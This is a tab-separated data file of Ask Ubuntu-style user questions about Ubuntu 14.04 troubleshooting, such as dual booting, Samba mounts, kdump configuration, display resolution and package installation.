485354	random number generation	i have generated random numbers in turbo c++ ( dos ) by using random command . again , i have generated random number in ubuntu c++ by using srand and rand commands . both the random generations are not matching each other ( ie . both generations are different for a particular seed ) . please let me know the reasons behind this problem . is it possible to get a code behind random command , srand and rand commands ?
485355	advanced file copy & move utility for ubuntu	are there any powerful file copy and move utility for ubuntu 14.04 instead of ubuntu default file copy utility with the following features : add or remove files and folders to its queue for easy dealing with mass file operations . pause/resume or skip ability to be set as default file copy manager
485356	how to trim file name containing extra characters using shell commands	i have a list of thousand files which have filenames with .txt.txt appended twice , i want to remove the second .txt from the file . for eg . file1.txt.txt is the original file . i want to rename it to file1.txt i can not do it manually because there are thousand files . i tried different combinations using mv command but got no luck . please help .
485357	unknown error from startup disk creator	i do n't understand this error from the startup disk creator : org.freedesktop.dbus.python.attributeerror : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/dbus/service.py '' , line 707 , in _message_cb retval = candidate_method ( self , *args , **keywords ) file `` /usr/share/usb-creator/usb-creator-helper '' , line 218 , in format parent_dev = _get_parent_object ( udisks , device ) file `` /usr/share/usb-creator/usb-creator-helper '' , line 49 , in _get_parent_object parent = partition.get_cached_property ( 'table ' ) .get_string ( ) attributeerror : 'nonetype ' object has no attribute 'get_cached_property' what does this mean ? i only want to erase the 2gb mp3 player in order to put the iso on there . the disk creator requires this step .
485360	how to install notes designer and domino server in ubuntu 14.04	i 've managed to install notes client 9.0.1 but since i 'm a developer i need the notes designer and the domino server also installed . how do i install notes designer and domino server 9.0.1 in ubuntu 14.04 ?
485363	better search feature in pdf	i want to search a word like fooonetwo in one pdf . so the point is i do not know the real ward is foo_one_two or foo.one.two or foo-one-two or foo-one_two ! or ... . or better to say i want to search for words which at the same time include foo and one and two . so i remember in the database we have kind of this feature : for example a query for looking for words which start by foo and also include one and two . so is there any pdf viewer to do that ? what pdf viewer and how to do that .
485366	shutdown ubuntu from a wine application	i have been developing an application that users will use in a full screen mode avoiding them from having access to the desktop . is there any possible way to send a shutdown command from a wine application to actually shutdown the machine . i know it can potentially be done by keyboard shortcuts , but i would rather have a physical click-able button in the user interface . thanks , nexus_guy
485367	how to re-share a printer ( adding extra queue ? )	i would like to know if its possible and if so how one can ( re- ) share an already shared network printer in ubuntu ? i ask this because a host of mine can not print to one of my printers because of an unknown issue . now i would like to `` route '' the printer connection from the problem-host over another host e.g . my laptop to get it to the printer ( my laptop can print from said printer ) . for this i guess it would be applicable to ( re- ) share the connection i have to the printer so that its available to the problem-host but i do n't know how to do this .
485374	problem with dual boot ( 14.04 & 8.1 ) ; windows 8.1 not working	i have installed ubuntu 14.04 on my windows 8.1 machine using bootable usb . while installing i selected the same drive where windows is installed and got ubuntu installed . after installation i can see windows entry while booting but after selecting windows 8 from that menu nothing happens , a cursor keeps on blinking and finally nothing happens . now i am unable to boot into windows . any help/suggestions will be appreciated .
485375	how to extract synopsys .tz files on ubuntu	i have downloaded some tar fies for my cad tools ( from their site ) . when i extracted my tar , it gave out .tz files . how can i extract files from them or is n't it a tar archive ? please help me .
485381	kdump fails to log server crash event	i 'm running ubuntu server 14.04 on a machine that is experiencing random crashes under load . the server does n't restart independently , but it becomes inaccessible via ssh or direct kvm connection . i suspect cpu issues , but i 'm looking for a smoking gun , so i 'm following the instructions here : https : //wiki.ubuntu.com/kernel/crashdumprecipe however , no logfile appears in /var/crash after either a natural or induced crash . details : ( i induced a crash between each change described here , with no change . ) everything went smoothly until i got to this step : $ cat /sys/kernel/kexec_crash_loaded 0 expected output was 1 . a bit of digging led me to /etc/default/kdump-tools , where i set use_kdump=1 . when that did n't work , i added kdump_sysctl= '' kernel.panic=60 kernel.panic_on_oops=1 '' based on the sysctl documentation . still no joy , so i modified the param directly with sysctl -w kernel.panic=60 to supposedly add extra time for kdump to do its thing . in every case , i would run : echo c | sudo tee /proc/sysrq-trigger the computer would crash and reboot as expected , but all i 'd see is this : $ ls /var/crash kexec_cmd /var/log/kern.log contains only log entries from boot , not from the crashes . ( not sure if this is expected , but i thought i 'd mention it anyway . ) is there something wrong with my configuration ?
485382	dolphin in ubuntu 14.04 : background color change on new tab opening	i have installed dolphin file manager in ubuntu 14.04 and everything ( its appearance ) is good . this is how it should and looks like : but as soon as i open a new tab , it 's background color changes and becomes like this : any help is appreciated , thanks .
485385	internet not working with incorrect static network settings	i have ubuntu 14.4 lts , 64 bits os . since a restart today morning , my system is making problems . my skype on ubuntu is working but i 'm unable to ping google.com and even my google chrome browser is not accessing any website . even with any other browser , i 'm unable to surf websites , even if skype working well . teamviewer is not working too . how to fix it ?
485386	how to make a project of krusader	an example for my general question an introduction to translating and debugging source code : i had installed the 'qt 4 designer ' and i have downloaded the krusader-2.4.0-beta3.tar.bz2 file . among the packed files i see the cmakelists.txt that contains project ( krusader ) include ( cpack ) set ( version `` 2.4.0-beta3 '' ) set ( release_name `` single step '' ) find_package ( kde4 required ) include ( kde4defaults ) include_directories ( $ { kde4_includes } $ { kde4_include_dir } $ { qt_includes } ) set ( cmake_verbose_makefile off ) add_definitions ( $ { qt_definitions } $ { kde4_definitions } ) add_definitions ( `` -dkrarc_enabled '' ) find_package ( acl ) if ( acl_found ) add_definitions ( -dhave_posix_acl ) endif ( acl_found ) # include ( configurechecks.cmake ) add_subdirectory ( krusader ) add_subdirectory ( pics ) add_subdirectory ( doc-extras ) add_subdirectory ( krarc ) add_subdirectory ( iso ) add_subdirectory ( doc ) # add_subdirectory ( krfiledialog ) - not used # add_subdirectory ( virt ) - not used # add_subdirectory ( tar ) - not used message ( status `` $ { cmake_current_source_dir } : skipped subdir $ ( tardir ) '' ) include ( macrooptionaladdsubdirectory ) macro_optional_add_subdirectory ( po ) . i guess that i am to find or choose my directories and define them by me_user @ my_cpu : ~ $ kde4_includes=the directory etc . i need an introduction about rules for it ; maybe the directories are among the following/home/me_user/.kde/share/kde4/ /home/me_user/ot/5.l.0/android_x86/src/android/java/src/org/kde/ /home/me_user/ot/5.1.0/android_armv7/src/android/java/src/org/kde/ /home/me_user/g/ot/krusader-2.4.0-beta3/pics/kde3/ /home/me_user/g/libreoffice-3.5.7.2/core/fpicker/source/unx/kde_unx/ /home/me_user/g/libreoffice-3.5.7.2/core/fpicker/source/unx/kde4/ /home/me_user/g/libreoffice-3.5.7.2/core/fpicker/source/unx/kde/ /home/me_user/g/libreoffice-3.5.7.2/core/scp2/source/kde/ /home/me_user/g/libreoffice-3.5.7.2/core/extras/unx/source/kde/ /home/me_user/g/libreoffice-3.5.7.2/core/shell/source/backends/kde4be/ /home/me_user/g/libreoffice-3.5.7.2/core/shell/source/backends/kdebe/ /home/me_user/g/libreoffice-3.5.7.2/core/vcl/unx/kde4/ /home/me_user/g/libreoffice-3.5.7.2/core/vcl/unx/kde/ /home/me_user/g/libreoffice-3.5.7.2/core/vcl/inc/unx/kde/ /tmp/kde-me_usermylhh5/ /var/tmp/kdecache-root/ /var/tmp/kdecache-me_user/ /var/tmp/kdecache-she_user/ /var/tmp/kdecache-me_user/kio_help/usr/share/doc/kde/ /usr/share/kde4/ /usr/share/applications/kde4/ /usr/share/emoticons/kde4/ /usr/share/pyshared/softwareproperties/kde/ /usr/share/locale/ru/lc_scripts/kdelibs4/ /usr/share/locale/de/lc_scripts/kdelibs4/ /usr/share/doc/kde-l10n-cs/ /usr/share/doc/kdepim-runtime/ /usr/share/doc/kde-l10n-sk/ /usr/share/doc/kdepimlibs-kio-plugins/ /usr/share/doc/kde-l10n-de/ /usr/share/doc/kdelibs5-plugins/ /usr/share/doc/kde-l10n-engb/ /usr/share/doc/kde-runtime/ /usr/share/doc/kde/ /usr/share/doc/kde-runtime-data/ /usr/share/doc/kdelibs-bin/ /usr/share/doc/kdelibs5-data/ /usr/share/doc/kde-l10n-ru/ /usr/share/doc/kde/html/en/kdesu/ /usr/share/doc/kde/html/en/kdebugdialog/ /usr/share/doc/kde/html/en/kcontrol/kded/ /usr/share/doc/kde/html/ru/kdesu/ /usr/share/doc/kde/html/ru/kdebugdialog/ /usr/share/doc/kde/html/de/kdesu/ /usr/share/doc/kde/html/de/kdepasswd/ /usr/share/doc/kde/html/de/kdebugdialog/ /usr/share/doc/kde/html/de/kcontrol/kded/ /usr/share/kde4/apps/kdeui/ /usr/share/kde4/apps/kdewidgets/ /usr/share/kde4/apps/kde/ /usr/share/kde4/services/kded/ /usr/share/gettext/projects/kde/ /usr/share/perl5/debconf/frontend/kde/ /usr/share/perl5/debconf/element/kde/ /usr/share/ontology/kde/ /usr/lib/kde4/ /usr/lib/kde4/libexec/kdesu~distrib/ /usr/lib/kde4/platformimports/touch/org/kde/ /usr/lib/kde4/imports/org/kde/ /usr/lib/python2.7/dist-packages/softwareproperties/kde/ . or should i install yet something more from the kde ? i have tried openingkrusaderversion.h.cmake ( the only *.cmake from the download ) in the 'qt creator ' and building it , but it demands many parameters . i 'd like to know how to find the parameters , as far as possible directly from the downloaded files . this is what i meant by a `` general introduction 'how to make such projects ' '' , maybe for kde projects particularly ; is something like it available ? thanks .
485394	intel gma gui for ubuntu	i have ubuntu 14.04 and i want to know if there 's a gui for setting intel graphics settings like this :
485397	adjust color temperature using gui	i 'm using a laptop with ubuntu 14.04 , using a external monitor i can adjust the color temp of the external monitor using its physical buttons in the monitor . the question is , is there a way to adjust brightness , contrast . r , g , b slider with ubuntu using a graphical user interface , is there such a gui for adjusting color temperature ?
485398	install only maas-region-controller on base ubuntu 14.04lts base server	i 've tried to install only the region controller on a clear ubuntu server using the command sudo apt-get install maas-region-controller but during the installation receive this error | an error occurred while installing the database : │ │ │ │ psql : could not connect to server : no such file or directory is the │ │ server running locally and accepting connections on unix domain socket │ │ `` /var/run/postgresql/.s.pgsql.5432 '' ? ** ... next step for database installation : │ │ │ │ abort │ │ retry │ │ retry ( skip questions ) │ │ ignore is there someone has tried to install the region controller via apt ? thanks a lot
485399	ubuntu in virtualbox logs in to blank purple screen ( nomodeset does n't help )	i 've installed ubuntu 14.04 lts in an oracle vm virtualbox on an hp pavilion laptop . when i start it , i get a logon screen , but when i logon it just hangs with a blank purple screen . i tried the advice at http : //turriebuntu.wordpress.com/general-ubuntu-pages/ubuntu-boot-freeze-lockup-it-stops-with-a-blank-purple-or-black-screen/ -- intercepted the boot sequence and entered nomodeset but it made no difference ( although that was for a different version , and i suspect getting to the logon screen means i 'd already got past that point ) . what 's a linux/ubuntu novice to do to actually get into ubuntu ?
485401	what security differences are between click and .deb package ?	installing a random ( nasty ? ) .deb can be dangerous because it will grant all privilege to the apps and daemon installed because the .deb has some configs asking to applied if the user valid his password at the installation process . click package does n't need a password ( as far i have tested ) . will click package be safer to the system/userdata or will it be the same ? why ? some aspects that would be great to be answered : are click and deb based on the same system ( dpkg ) ? can apparmor provide a root access to apps without password or something ? will the user be prompted to accept the access rights of the apps when installing ( android-like example : this apps will be able to scan your /home and access network ) or on the run at the need of a right ( browser-like example asking the right to use the cam ) ? close to this question : does .apk and click will word the same ( about policies and user story ) ? mainly : can an app send all my private data on the network with click without let me know it explicitly or will it have at least the right validated by users to do so or will it be blocked in a sandbox anyway ? it is true to say : click package are less powerful ( restrict more things ) , but more safer ?
485402	error on synaptic reload	error on reloading synaptic package manager . `` could not download all repository indexes . '' problem with medibuntu repositories . something wicked happened . how do i resolve this ? `` failed to fetch http : //packages.medibuntu.org/dists/precise/release.gpg something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) failed to fetch http : //packages.medibuntu.org/dists/precise/free/binary-amd64/packages something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) ''
485405	emit signal with custom type objects array parameter from c++ and receive in qml	i would like to emit a signal from a qt c++ class which includes a parameter that is an array of custom objects ( inherited from qobject ) and receive the parameter in its qml slot , but i 'm afraid it is not available at qml code . let 's say , for instance , that i have my class class testtype : public qobject { q_object q_property ( qstring name read name ) q_property ( qint32 id read id ) public : explicit testtype ( qobject *parent = 0 ) : qobject ( parent ) { } qint32 id ( ) const { return m_id ; } void setid ( qint32 id ) { m_id = id ; } qstring name ( ) const { return m_name ; } void setname ( qstring name ) { m_name = name ; } private : qint32 m_id ; qstring m_name ; } ; the type is registered this way : qmlregistertype < testtype > ( uri , 0 , 1 , `` testtype '' ) ; and i have a class where i emit a signal like this q_signals : void mysignal ( qlist < testtype * > array ) ; if i emit the signal with the array populated with several elements , if i try to read in qml slot : onmysignal : { console.log ( `` element : '' + array [ 0 ] ) ; } i see `` undefined '' as array [ 0 ] and , obviously , any class member the array element has . when i have made tests sending a standalone testtype object as signal parameter i have got it in qml slot without any problem , but i 'm not able to send an array of them . i 've tried to use qlist , qmllistproperty or qvariantlist with the same result . is there any way of sending an array of custom type inherited from qobject elements as a signal parameter ?
485412	error when mounting a shared drive via samba	i have set up a windows workgroup in order to see my network drive . the network shows it but i ca n't mount it via smb4k and access it . and get the error message the share `` //mybooklive/public could not be mounted mount.cifs : permission denied : no match for /home/viktoria/smb4k/mybooklive/public in etc/fstab i have installed samba sudo apt-get install samba i have opened the configuration sudo gedit/etc/samba/smb.conf and changed the file according to share ext4 partition over network using of course my configuration . my computer can trace find the other computer on the network , can find the printers and the network drive but i can not mount it or access the files . i am sorry for my silly questions but i am a first time ubuntu user and i understand very little about it . i have to mention that there are two workgroups that i am connecting to . the one has two windows pcs and the other has only the network drive . i do n't why this is happening . the other thing is that sometimes i see the workgroup with the network drive in the smb4k and sometimes i do n't . i am pretty sure that i have to do something more but i do n't know what . what do i have to do ? thanks in advance
485415	dual boot problem ; how to add windows vista on grub menu ?	i have a toshiba psaarl - 03s004 . i 've installed my window vista on hard disk c , but there is no selection to boot into window vista on grub ! i only can boot into ubuntu server now ! edit result of sudo blkid /dev/sda1/ uuid= '' bcbe885a-0922-40d2-9135-479677736db3 '' type=ext2 ' . /dev/sda5 : uuid '' uogsls-6zti-iojp-jpjl-2zpu-aylo-njvzwp '' type=lvm2_member '' . /dev/mapper/rigo -- vg-root : uuid= '' e07cb65d-1880-41fb-bf41-fcf034c38c6d '' type= '' ext4 ''
485416	best way to configure apache2 access rights	i have a server with ubuntu 14.04 . i installed apache2 , php5 and pure-ftpd . so apache is running in mpm prefork with one process owned by root and all child processes owned by www-data . the /var/www/html is owned by root ( -rw-r -- r -- 1 root root ) now i have a ftp user called ftpuser . what would be the best way ( and more secure ) so that the ftpuser can create and edit files under /var/www/html ? can i change the group owner of /var/www/html to www-data with write access and add ftpuser to www-data group ? if now i also want to use mediawiki , it sometimes needs write access to the /var/www/html . so same question : can i change the group owner of /var/www/html to www-data with write access ?
485417	display bug on resolution > 800 / ubuntu 14 on vmware	i moved a vm to a laptop ( 1366x768 ) . now i have a problem with the resolution . everything is ok on 800x600 . if i change the resolution to something higher than 800 ( eg : 1024x768.. ) , then , everything after the 800th pixel is mirrored on the first 800 pixels . running a linux 3.13.0-29-generic x86_64 x86_64 on vmware 6.0.2 everything updated ( dist , package , vmware ) . i tried - to reconfigure xorg , re-install xorg . - different window manager , re-installed them , - playing with xrandr , - uninstalling nvidia driver on hosting pc . none of the above worked . cvt 1024 768 60 # 1024x768 59.92 hz ( cvt 0.79m3 ) hsync : 47.82 khz ; pclk : 63.50 mhz modeline `` 1024x768_60.00 '' 63.50 1024 1072 1176 1328 768 771 775 798 -hsync +vsync xrandr -- verbose xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 200 , current 800 x 600 , maximum 3840 x 1920 default connected primary 800x600+0+0 ( 0x183 ) normal ( normal ) 0mm x 0mm identifier : 0x17d timestamp : 403790 subpixel : unknown clones : crtc : 0 crtcs : 0 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : 1024x768 ( 0x17e ) 47.2mhz h : width 1024 start 0 end 0 total 1024 skew 0 clock 46.1khz v : height 768 start 0 end 0 total 768 clock 60.0hz 1024x768 ( 0x17f ) 66.8mhz h : width 1024 start 0 end 0 total 1024 skew 0 clock 65.3khz v : height 768 start 0 end 0 total 768 clock 85.0hz 1024x768 ( 0x180 ) 59.0mhz h : width 1024 start 0 end 0 total 1024 skew 0 clock 57.6khz v : height 768 start 0 end 0 total 768 clock 75.0hz 1024x768 ( 0x181 ) 55.1mhz h : width 1024 start 0 end 0 total 1024 skew 0 clock 53.8khz v : height 768 start 0 end 0 total 768 clock 70.0hz 1024x768 ( 0x182 ) 0.0mhz h : width 1024 start 0 end 0 total 1024 skew 0 clock 0.0khz v : height 768 start 0 end 0 total 768 clock 0.0hz 800x600 ( 0x183 ) 28.8mhz *current h : width 800 start 0 end 0 total 800 skew 0 clock 36.0khz v : height 600 start 0 end 0 total 600 clock 60.0hz 800x600 ( 0x184 ) 40.8mhz h : width 800 start 0 end 0 total 800 skew 0 clock 51.0khz v : height 600 start 0 end 0 total 600 clock 85.0hz any ideas on how to proceed ? i 've spent 10 hours on this already , without success . edit : i use vmware player
485419	strip off attachments from emails in thunderbird	some newsletters consistently send headers , banners , etc . with their newsletter emails . after a while , the total size of this data becomes quite relevant to a small mailbox . we 're looking for a script that can process a list of emails and remove all attachments ( or attachments that match a certain pattern ) from these emails .
485421	which is the shortest way to list a running process ?	i often need to check if a process is running , so i use one of these : ps aux | grep myprocess ps -fe | grep myprocess top pgrep myprocess ( only shows the pid ) pkill myprocess ( if i want to kill it ) all of the above commands work well but , is there a shorter command to do this ? any answer is appreciated , but the chosen one needs to be ... a built in solution , as i work with many different devices . enables to use a pattern . gives you similar information than ps aux . shorter than what we already know . thanks
485423	how do i deal with an error message installing ubuntu from dvd on an old machine ?	i have an old win xp pc that i wiped the drive on ( thoroughly ) . i downloaded ubuntu on another pc and copied it onto a dvd . when i try to boot on the old xp pc from the ubuntu files on the dvd i get an error message , something like the boot failed ... duh . i selected the boot device after selecting the f10 boot option when i power up the old pc . still , the same error message . if you can help , please keep it simple . i am only an intermediate user .
485426	is there any software application for ubuntu like ramdisk by dataram ?	currently i using ramdisk in windows7 by using http : //memory.dataram.com/products-and-services/software/ramdisk . update : ramdisk software by dataram has the ability to save ramdisk virtual disk image on shutdown and restore on windows startup and sync data to hard disk automatically on specified time interval i am looking for the similar functionality of software application in ubuntu
485430	installing from a folder of debian files	i have a folder containing debian files for these packages : advancecomp akonadi-backend-mysql akonadi-server akonadiconsole akregator amor analitza-common ark astrometry.net audiocd-kio avogadro-data baloo blinken blogilo bomber bovo build-essential cantor cantor-backend-kalgebra cervisia chemical-mime-data consolekit dirmngr docbook docbook-to-man docbook-xml docbook-xsl dolphin dpkg-dev dragonplayer edict fakeroot festival festival-freebsoft-utils festlex-cmu festlex-poslex festvox-kallpc16k filelight fonts-dustin fonts-lmodern freerdp-x11 freespacenotifier g++ g++-4.8 gawk gnugo gnupg-agent gnupg2 gpgsm granatier graphviz gwenview icoutils imagemagick imagemagick-common jovie juk kaccessible kaddressbook kajongg kalarm kalgebra kalgebra-common kalzium kalzium-data kamera kanagram kanjidic kapman kapptemplate kate kate-data katepart katomic kblackbox kblocks kbounce kbreakout kbruch kcachegrind kcalc kcharselect kcolorchooser kcron kde-base-artwork kde-baseapps kde-baseapps-bin kde-baseapps-data kde-config-cddb kde-config-cron kde-config-pimactivity kde-full kde-icons-mono kde-plasma-desktop kde-plasma-netbook kde-runtime kde-runtime-data kde-standard kde-style-oxygen kde-wallpapers kde-wallpapers-default kde-window-manager kde-window-manager-common kde-workspace kde-workspace-bin kde-workspace-data kde-workspace-kgreet-plugins kde-zeroconf kdeaccessibility kdeadmin kdeartwork kdeartwork-emoticons kdeartwork-style kdeartwork-theme-window kdeedu kdeedu-kvtml-data kdegames kdegames-card-data kdegames-data kdegames-mahjongg-data kdegraphics kdegraphics-mobipocket kdegraphics-strigi-analyzer kdegraphics-thumbnailers kdelibs-bin kdelibs5-data kdelibs5-plugins kdemultimedia kdenetwork kdenetwork-filesharing kdenetwork-strigi-analyzers kdepasswd kdepim kdepim-kresources kdepim-runtime kdepimlibs-kio-plugins kdeplasma-addons kdesdk kdesdk-dolphin-plugins kdesdk-kio-plugins kdesdk-misc kdesdk-scripts kdesdk-strigi-plugins kdesdk-thumbnailers kdetoys kdeutils kdewallpapers kdewebdev kdf kdiamond kdm kdoctools kfilereplace kfind kfourinline kgamma kgeography kgeography-data kget kgoldrunner kgpg khangman khelpcenter4 kig kigo killbots kimagemapeditor kinfocenter kio-audiocd kiriki kiten kjots kjumpingcube kleopatra klettres klettres-data klickety klines klinkstatus klipper kmag kmahjongg kmail kmenuedit kmines kmix kmousetool kmouth kmplot kmtrace knavalbattle knetwalk knode knotes kolf kollision kolourpaint4 kommander kompare konq-plugins konqueror konqueror-nsplugins konquest konsole konsolekalendar kontact kopete kopete-message-indicator korganizer kpartloader kpat krdc kremotecontrol kreversi krfb krosspython kruler ksaneplugin kscd kscreensaver kscreensaver-xsavers kshisen ksirk ksnakeduel ksnapshot kspaceduel ksquares kstars kstars-data ksudoku ksysguard ksysguardd ksystemlog kteatime ktimer ktimetracker ktouch ktouch-data ktuberling kturtle ktux kubrick kubuntu-debug-installer kuiviewer kuser kwalletmanager kwordquiz kwrite libaccounts-qt1 libaio1 libakonadi-calendar4 libakonadi-contact4 libakonadi-kabc4 libakonadi-kcal4 libakonadi-kde4 libakonadi-kmime4 libakonadi-notes4 libakonadi-socialutils4 libakonadiprotocolinternals1 libalgorithm-diff-perl libalgorithm-diff-xs-perl libalgorithm-merge-perl libanalitza5abi1 libanalitzagui5abi1 libanalitzaplot5abi1 libao-common libao4 libapr1 libaprutil1 libastro1 libattica0.4 libavcodec54 libavformat54 libavogadro1 libavutil52 libbaloocore4 libbaloofiles4 libbaloopim4 libbaloowidgets4 libbalooxapian4 libblas3 libboost-program-options1.54.0 libboost-python1.54.0 libboost-thread1.54.0 libcalendarsupport4 libcdt5 libcfitsio3 libcgraph6 libck-connector0 libcln6 libcomposereditorng4 libdiscid0 libdlrestrictions1 libdmtx0a libencode-locale-perl libepub0 libestools2.1 libeventviews4 libfakeroot libfftw3-double3 libfile-listing-perl libfont-afm-perl libftdi1 libgadu3 libgfortran3 libgif4 libgl2ps0 libgle3 libgpgme++2 libgps20 libgrantlee-core0 libgrantlee-gui0 libgsl0ldbl libgsm1 libgvc6 libgvpr2 libhtml-form-perl libhtml-format-perl libhtml-parser-perl libhtml-tagset-perl libhtml-tree-perl libhttp-cookies-perl libhttp-daemon-perl libhttp-date-perl libhttp-message-perl libhttp-negotiate-perl libilmbase6 libincidenceeditorsng4 libindi-data libindi0c libindicate-qt1 libindicate5 libio-html-perl libjpeg-progs libjpeg-turbo-progs libjs-jquery libjs-sphinxdoc libjs-underscore libkabc4 libkactivities-bin libkactivities-models1 libkactivities6 libkalarmcal2 libkasten2controllers2abi1 libkasten2core2 libkasten2gui2 libkasten2okteta1controllers1abi1 libkasten2okteta1core1 libkasten2okteta1gui1 libkateinterfaces4 libkatepartinterfaces4 libkblog4 libkcal4 libkcalcore4 libkcalutils4 libkcddb4 libkcmutils4 libkcompactdisc4 libkdcraw-data libkdcraw23 libkde3support4 libkdeclarative5 libkdecorations4abi1 libkdecore5 libkdeedu-data libkdegames6 libkdepim4 libkdepimdbusinterfaces4 libkdesu5 libkdeui5 libkdewebkit5 libkdgantt2-0 libkdnssd4 libkeduvocdocument4 libkemoticons4 libkephal4abi1 libkexiv2-11 libkexiv2-data libkfbapi1 libkfile4 libkfilemetadata4 libkgapi2-2 libkholidays4 libkhtml5 libkidletime4 libkimap4 libkio5 libkipi-data libkipi11 libkiten4abi1 libkjsapi4 libkjsembed4 libkldap4 libkleo4 libkmahjongglib4 libkmanagesieve4 libkmbox4 libkmediaplayer4 libkmime4 libknewstuff2-4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkolab0 libkolabxml1 libkomparediff2-4 libkonq-common libkonq5-templates libkonq5abi1 libkonqsidebarplugin4a libkontactinterface4 libkopete4 libkparts4 libkpgp4 libkpimidentities4 libkpimtextedit4 libkpimutils4 libkprintutils4 libkpty4 libkresources4 libkrosscore4 libkrossui4 libksane-data libksane0 libksba8 libkscreen1 libkscreensaver5 libksgrd4 libksieve4 libksieveui4 libksignalplotter4 libktexteditor4 libktnef4 libktorrent5 libkubuntu0 libkunitconversion4 libkwineffects1abi4 libkwinglesutils1 libkwinglutils1abi3 libkworkspace4abi2 libkxmlrpcclient4 liblapack3 liblightdm-qt-3-0 liblqr-1-0 liblwp-mediatypes-perl liblwp-protocol-https-perl libmagickcore5 libmagickcore5-extra libmagickwand5 libmailcommon4 libmailimporter4 libmailtransport4 libmarblewidget18 libmediastreamer-base3 libmessagecomposer4 libmessagecore4 libmessagelist4 libmessageviewer4 libmicroblog4 libmms0 libmodemmanagerqt1 libmp3lame0 libmsn0.3 libmusicbrainz3-6 libmusicbrainz5-0 libmysqlclient18 libnepomuk4 libnepomukcleaner4 libnepomukcore4abi1 libnepomukquery4a libnepomukutils4 libnet-http-perl libnetpbm10 libnetworkmanagerqt1 libnoteshared4 libnova-0.14-0 libntrack-qt4-1 libntrack0 liboath0 libokteta1core1 libokteta1gui1 libokularcore4 libopenal-data libopenal1 libopenbabel4 libopenconnect2 libopencore-amrnb0 libopencore-amrwb0 libopenexr6 libopenjpeg2 libopus0 libortp9 libotr5 libpam-ck-connector libpathplan4 libphonon4 libpimactivity4 libpimcommon4 libplasma-geolocation-interface4 libplasma3 libplasmaclock4abi4 libplasmagenericshell4 libpolkit-qt-1-1 libpoppler-qt4-4 libprison0 libprocesscore4abi1 libprocessui4a libptexenc1 libpth20 libqaccessibilityclient0 libqalculate5 libqalculate5-data libqapt2 libqapt2-runtime libqca2 libqca2-plugin-ossl libqextserialport1 libqgpgme1 libqhull6 libqimageblitz4 libqjson0 libqmobipocket1 libqoauth1 libqrencode3 libqt4-qt3support libqt4-sql-mysql libqtlocation1 libquazip0 libruby1.9.1 libschroedinger-1.0-0 libsendlater4 libserf-1-1 libshp1 libsignon-qt1 libsigsegv2 libsolid4 libsoprano4 libsox-fmt-alsa libsox-fmt-base libsox2 libsp1c2 libspandsp2 libsrtp0 libstdc++-4.8-dev libstreamanalyzer0 libstreams0 libsvn1 libswscale2 libsyndication4 libtaskmanager4abi5 libtelepathy-qt4-2 libtemplateparser4 libthreadweaver4 libtidy-0.99-0 libupnp6 libva1 libvirtodbc0 libwcs4 libweather-ion6 libwlocate0 libwww-perl libwww-robotrules-perl libx264-142 libxcb-composite0 libxcb-damage0 libxcb-keysyms1 libxcb-xtest0 libxerces-c3.1 libxml2-utils libxvidcore4 libyaml-0-2 libzip2 lightdm-kde-greeter lirc lmodern lokalize lskat luatex marble marble-data marble-plugins mysql-client-core-5.5 mysql-common mysql-server-core-5.5 nepomuk-core-data nepomuk-core-runtime netpbm ntrack-module-libnl-0 odbcinst odbcinst1debian2 okteta okular optipng oxygen-cursor-theme oxygen-icon-theme p7zip-full palapeli palapeli-data parley parley-data phonon phonon-backend-gstreamer phonon-backend-gstreamer-common phonon-backend-gstreamer1.0 picmi pinentry-gtk2 pinentry-qt4 pkg-kde-tools plasma-containments-addons plasma-dataengines-addons plasma-dataengines-workspace plasma-desktop plasma-desktopthemes-artwork plasma-netbook plasma-nm plasma-runners-addons plasma-scriptengine-javascript plasma-scriptengine-superkaramba plasma-wallpapers-addons plasma-widget-folderview plasma-widget-lancelot plasma-widget-message-indicator plasma-widget-networkmanagement plasma-widgets-addons plasma-widgets-workspace polkit-kde-1 poxml python-avogadro python-beautifulsoup python-dateutil python-enchant python-iniparse python-kde4 python-levenshtein python-numpy python-pyfits python-qt4-sql python-simplejson python-utidylib python-vobject qapt-batch qhull-bin qtdeclarative4-kqtquickcharts-1 rocs ruby ruby1.9.1 scdaemon setserial sgml-data shared-desktop-ontologies soprano-daemon sound-icons sox sp speech-dispatcher-festival step subversion svgpart sweeper systemsettings tex-common texlive-base texlive-binaries texlive-latex-base texlive-latex-base-doc texlive-luatex translate-toolkit ttf-dejavu-core ttf-sjfonts umbrello update-notifier-kde valgrind virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common vorbis-tools xscreensaver-data xscreensaver-data-extra xscreensaver-gl xscreensaver-gl-extra xscreensaver-screensaver-bsod is it possible to install these debian files from he folder using command ? note : the debian files may not be the latest version . the folder has a lot more .deb files and i do n't want to add all of them to apt .
485433	ubuntu 14.04 second display brightness problem	few days ago i have setupped ubuntu 14.04 . i 'm using laptop and second monitor via hdmi cable . now every about 1-2 minutes my second monitor 's brightness changes ( increase after that decrease and inverse ) . how can i solve that problem ? thanks in advance .
485438	eclipse kepler crashes on ubuntu 14.04 when using windowbuilder	i 'm using ubuntu 14.04 and with a lot of problems i have to face daily with this os , there is another recent one . problem : whenever i try to use eclipse 's windowbuilder to design swing guis , after a few clicks/tasks on window canvas , eclipse suddenly hangs up , i have to force quit eclipse . i restart eclipse and all my previous progress is lost ( obviously ) . setup : java jdk = javase7 x64 - oracle java ( not open jdk - well both jdks cause same problem ) eclipse kepler 4.3.2 ( jee edition ) x64 ubuntu 14.04 desktop ( installed with liveusb ) hp dv6 - os installed on ssd kindly help me out here . i was creating a gui based project on windows , and eclipse+windowbuilder works like a charm there . [ i do n't want to go back to windows.. screams ... . ] for any kind of logs required , please do tell me .
485442	lenovo g700 & ubuntu 14.04	i have few problems with this computer and ubuntu . firstly , if i slide across my touchpad multiple times , the computer freezes . but if i use usb mouse , the problem wo n't occur . secondly i ca n't create a wifi hotspot using access point mode . lastly my bluetooth is softblocked and i ca n't connect any devices to it . 1 : ideapad_bluetooth : bluetooth soft blocked : yes hard blocked : no i have tried rfkill unblock all , and few other options , nothing works . thank you for any help , regards
